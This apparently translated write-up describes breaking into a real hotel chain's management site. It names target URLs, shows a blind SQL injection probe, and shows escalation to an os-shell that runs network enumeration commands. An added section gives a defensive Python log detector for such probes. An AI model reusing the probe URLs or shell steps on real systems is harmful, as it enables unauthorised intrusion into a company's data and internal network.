I started with a page found online: http://mgs.homeinns.com/Login.aspx. There was nothing to do there, so I appended index.aspx; the interface looked like this:

Every page turned out to have access control, but it was enforced only by a JavaScript redirect. With JavaScript disabled, some pages still slip through the net, for example:
http://mgs.homeinns.com/HLifeCycle/HLCSearch.aspx

Click Search and it obligingly lists every hotel.
Open any hotel on the left; I used P2886 here (only hotels that have a former name will open). The URL is: http://mgs.homeinns.com/HLifeCycle/HLCOldName.aspx?ProCD=P2886
Pretty obvious, isn't it?
An even quicker way to confirm it: http://mgs.homeinns.com/HLifeCycle/HLCOldName.aspx?ProCD=P2886'-- shows that it is a blind injection, so I went straight to a tool.
The injection turned up a highly privileged database account that can execute system commands. The web server and database server are separate hosts, though, and the database server has no direct internet access.
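As an added example (not part of the original writeup), here is a small Python detector run over constructed IIS W3C-style log lines that flags the kind of probe shown above: a ProCD value that no longer matches its expected P-plus-digits shape or that carries a quote or comment sequence, including URL-encoded and double-encoded forms. The timestamps, the probe strings and the tautology pattern are constructed for the example; only the page path and parameter name come from the writeup.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed IIS W3C-style lines (date time cs-method cs-uri-stem cs-uri-query sc-status);
# only the page path and parameter name come from the writeup, the rest is invented.
SAMPLE_LOG = """\
2015-06-01 10:00:01 GET /HLifeCycle/HLCOldName.aspx ProCD=P2886 200
2015-06-01 10:00:05 GET /HLifeCycle/HLCOldName.aspx ProCD=P2886'-- 500
2015-06-01 10:00:09 GET /HLifeCycle/HLCOldName.aspx ProCD=P2886%27%20AND%201%3D1-- 200
2015-06-01 10:00:12 GET /HLifeCycle/HLCSearch.aspx - 200
2015-06-01 10:00:20 GET /HLifeCycle/HLCOldName.aspx ProCD=P2887 200
"""

# Shapes that should never appear in a parameter meant to hold a short hotel code.
PROBE_PATTERNS = [
    re.compile(r"'"),                                   # stray single quote
    re.compile(r"--|/\*"),                              # SQL comment sequences
    re.compile(r"\b(and|or)\b\s+\S+\s*=\s*\S+", re.I),  # boolean tautology probes
    re.compile(r"\bwaitfor\s+delay\b", re.I),           # time-based probes (MSSQL)
]
# Allow-list for ProCD: the writeup shows values like P2886, so expect P plus digits.
VALID_PROCD = re.compile(r"^P\d{1,6}$")

def suspicious_params(query):
    """Return (name, decoded_value, reason) for each parameter failing the allow-list or matching a probe."""
    findings = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for raw in values:
            value = unquote_plus(raw)  # parse_qs decoded once; second pass catches double-encoding
            if name == "ProCD" and not VALID_PROCD.match(value):
                findings.append((name, value, "does not match expected P<digits> shape"))
            for pat in PROBE_PATTERNS:
                if pat.search(value):
                    findings.append((name, value, f"matches probe pattern {pat.pattern!r}"))
                    break
    return findings

def scan_log(text):
    """Return (timestamp, uri-stem, status, findings) for each line whose query looks like a probe."""
    alerts = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 6 or parts[4] == "-":   # skip malformed lines and requests with no query
            continue
        date, time, _method, stem, query, status = parts
        findings = suspicious_params(query)
        if findings:
            alerts.append((f"{date} {time}", stem, int(status), findings))
    return alerts
```

The allow-list check is the part worth keeping even without the signatures: a parameter that identifies a record should be validated against its known shape server-side, and the query that uses it should be parameterised rather than concatenated.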
Had a look at the databases stored locally:

Workgroup information:

Too many to list. The os-shell session:

os-shell> net view /domain:home
do you want to retrieve the command standard output? [Y/n/a]
command standard output: